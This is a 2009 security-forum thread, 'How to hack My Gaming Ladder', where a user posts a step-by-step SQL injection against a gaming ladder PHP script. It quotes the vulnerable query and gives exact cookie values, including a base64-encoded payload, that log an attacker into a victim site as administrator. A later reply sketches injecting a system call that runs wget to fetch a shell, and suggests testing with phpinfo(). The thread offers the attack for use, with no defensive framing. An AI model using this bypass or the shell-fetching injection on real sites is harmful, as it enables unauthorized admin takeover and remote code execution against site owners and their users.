|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 109
Members: 0
Total: 109
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
How to hack My Gaming Ladder |
|
Posted: Thu Aug 13, 2009 4:55 am |
|
|
xalupeao |
Regular user |
|
|
Joined: May 23, 2009 |
Posts: 17 |
Location: Santiago, Chile |
|
|
|
|
|
|
Tipe: SQL Injection
Objetive: get managet :B
--------------------
Search in Google
-------------------
Ladder Script By
-------------------
Requirements
-------------------
• Firefox + Web Developer Complement
---------------
File Atacck
---------------
globals.php
SQL Query dont export magic quotes
LINE 8 : $userinfo=mysql_query("SELECT id,alias,pass FROM users WHERE id='$cplyrid' AND pass='$cplyrpw' ");
jejejej ! :B
------------------
Hacking
------------------
Enter in the site: www.yourvictim.tld/ladder/
Create a Cokkie [• In menu Cookies -> Add Cokkie]
Name = AID
Value= 1
Tick session cokie
----
Add other cookie
Name= APW
Value = JyBPUiBpZD0nMScgQU5EIHBhc3MgTElLRSAnJQ==
Tick session cokie
Reload (F5)
Enter Admin =)
Note : requires that the administrator has id 1
Note 2: JyBPUiBpZD0nMScgQU5EIHBhc3MgTElLRSAnJQ== is ' OR id='1' AND pass LIKE '% but encripte in base64()
=) |
|
|
|
|
|
|
|
|
Posted: Thu Aug 13, 2009 7:48 am |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Thu Aug 13, 2009 11:59 am |
|
|
BoboTiG |
Advanced user |
|
|
Joined: Jun 22, 2009 |
Posts: 66 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Fri Aug 14, 2009 11:05 am |
|
|
xalupeao |
Regular user |
|
|
Joined: May 23, 2009 |
Posts: 17 |
Location: Santiago, Chile |
|
|
|
|
|
|
but need code to insert a shell XD |
|
|
|
|
Posted: Fri Aug 14, 2009 1:46 pm |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
xalupeao wrote: | but need code to insert a shell XD |
That might be possible.. but more complicated. If you can get it to do something like this...
mysql_query("SELECT id,alias,pass FROM users WHERE id='1'"); system("wget -O http://shell.txt"); //$cplyrid' AND pass='$cplyrpw' "); |
|
|
|
|
Posted: Fri Aug 14, 2009 6:23 pm |
|
|
xalupeao |
Regular user |
|
|
Joined: May 23, 2009 |
Posts: 17 |
Location: Santiago, Chile |
|
|
|
|
|
|
|
|
|
|
Posted: Fri Aug 14, 2009 11:21 pm |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
well you can test it by trying to get phpinfo() to work. |
|
|
|
|
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|